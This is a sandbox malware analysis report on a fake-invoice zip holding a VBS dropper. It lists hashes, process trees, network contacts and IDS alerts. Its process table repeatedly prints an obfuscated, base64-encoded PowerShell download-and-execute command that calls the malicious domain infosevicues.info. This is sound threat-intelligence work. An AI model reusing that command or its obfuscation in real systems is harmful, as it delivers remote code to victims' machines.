Field | Value |
---|---|
File name | __faktura_9875.zip |
Full analysis | https://app.any.run/tasks/dc730fc6-c480-4cd8-b6e2-8e9d1c0769d4 |
Verdict | Malicious activity |
Analysis date | January 10, 2019, 14:32:13 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators | — |
MIME | application/zip |
File info | Zip archive data, at least v2.0 to extract |
MD5 | CE206F063C8C2121491CC4B6F4C5E8B8 |
SHA1 | 86DEB3E3C8F99B59373E66DB2CE995AD5390BB84 |
SHA256 | 16B35906A78E2683FB2C05CFA54F2FBE6CFD936DBA1354DC6789D67719EADECE |
SSDEEP | 12:50aeYO87awZJy4i17a9x6wMiMRSF41OrkhgLY1ZdsKzae7OcgaY:u3FxsJModMACzgLY3ii3Kc8 |
Extension | Detected type |
---|---|
.zip | ZIP compressed archive (100) |

Field | Value |
---|---|
ZipFileName | __faktura_9875.vbs |
ZipUncompressedSize | 651 |
ZipCompressedSize | 339 |
ZipCRC | 0xf776349e |
ZipModifyDate | 2019:01:10 05:46:29 |
ZipCompression | Deflated |
ZipBitFlag | - |
ZipRequiredVersion | 788 |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
2936 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\__faktura_9875.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Exit code: 0; Version: 5.60.0 |
2892 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\__faktura_9875.vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Version: 5.8.7600.16385 |
2440 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\__faktura_9875.vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Version: 5.8.7600.16385 |
3564 | "C:\Windows\System32\cmd.exe" /c po^w^ershell -E^nc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\cmd.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
4012 | powershell -Enc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
2348 | "C:\Windows\System32\cmd.exe" /c po^w^ershell -E^nc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\cmd.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
1104 | powershell -Enc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
772 | "C:\Windows\System32\cmd.exe" /c po^w^ershell -E^nc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\cmd.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
1440 | powershell -Enc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
3856 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand [encoded command not preserved in this extract] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2936 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa2936.26247\__faktura_9875.vbs | — | — | — |
4012 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OLNRTVW02882HJN3F5QC.temp | — | — | — |
1104 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GBCGBO981QTRV0O8M8F7.temp | — | — | — |
1440 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JH3DTHK80ESDDTRN1Z8I.temp | — | — | — |
3856 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N8UTB5F8KMUKI6FJ3JF4.temp | — | — | — |
2732 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B08OZ32K3EE2XK7XD6K0.temp | — | — | — |
3004 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PR7ICYH6KG83DW4MA3M1.temp | — | — | — |
2732 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF264685.TMP | binary | 6073B6FC66D2E68644893344F6904E4A | 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
3004 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 6073B6FC66D2E68644893344F6904E4A | 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
1440 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2640c9.TMP | binary | 6073B6FC66D2E68644893344F6904E4A | 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2892 | WScript.exe | 185.158.251.30:443 | serviceussupport.info | 23media GmbH | NL | unknown |
2440 | WScript.exe | 185.158.251.30:443 | serviceussupport.info | 23media GmbH | NL | unknown |
2732 | powershell.exe | 194.32.78.61:80 | infosevicues.info | — | — | suspicious |
1440 | powershell.exe | 194.32.78.61:443 | infosevicues.info | — | — | suspicious |
3856 | powershell.exe | 194.32.78.61:80 | infosevicues.info | — | — | suspicious |
4012 | powershell.exe | 194.32.78.61:443 | infosevicues.info | — | — | suspicious |
1104 | powershell.exe | 194.32.78.61:443 | infosevicues.info | — | — | suspicious |
3004 | powershell.exe | 194.32.78.61:80 | infosevicues.info | — | — | suspicious |
Domain | IP | Reputation |
---|---|---|
serviceussupport.info | — | unknown |
infosevicues.info | — | malicious |
PID | Process | Class | Message |
---|---|---|---|
3004 | powershell.exe | Potentially Bad Traffic | SUSPICIOUS [PTsecurity] SysInfo Exfiltration |
3004 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] System Enumeration via PowerShell |